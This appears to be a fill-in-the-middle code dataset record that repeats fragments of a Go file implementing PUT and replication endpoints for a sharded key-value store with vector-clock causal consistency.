// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
c.JSON(http.StatusCreated, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr {
continue
}
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
} | if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
| random_line_split |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func canDeliver(senderVC []int, replicaVC []int, view []string) bool {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
} else if i != senderID && senderVC[i] > replicaVC[i] { //if something else than the sender incremented clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
//Otherwise, our clock is only a difference of 1 in senderID slot between the currentVC and the senderVC
return true
}
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC
//which clock is bigger/max? which can we use?
//return sum total of vector clock
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// puts the current kv pair into the current store if the key-to-shard mapping strategy
// is the current shard id, otherwise, forward it to one of the nodes with the hashed shard id
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
//If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
c.JSON(http.StatusCreated, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr |
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
}
| {
continue
} | conditional_block |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func | (senderVC []int, replicaVC []int, view []string) bool {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
} else if i != senderID && senderVC[i] > replicaVC[i] { //if something else than the sender incremented clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
//Otherwise, our clock is only a difference of 1 in senderID slot between the currentVC and the senderVC
return true
}
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC
//which clock is bigger/max? which can we use?
//return sum total of vector clock
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// puts the current kv pair into the current store if the key-to-shard mapping strategy
// is the current shard id, otherwise, forward it to one of the nodes with the hashed shard id
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
//If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
c.JSON(http.StatusCreated, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr {
continue
}
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
}
| canDeliver | identifier_name |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func canDeliver(senderVC []int, replicaVC []int, view []string) bool |
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC
//which clock is bigger/max? which can we use?
//return sum total of vector clock
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// puts the current kv pair into the current store if the key-to-shard mapping strategy
// is the current shard id, otherwise, forward it to one of the nodes with the hashed shard id
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
//If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
c.JSON(http.StatusCreated, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr {
continue
}
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
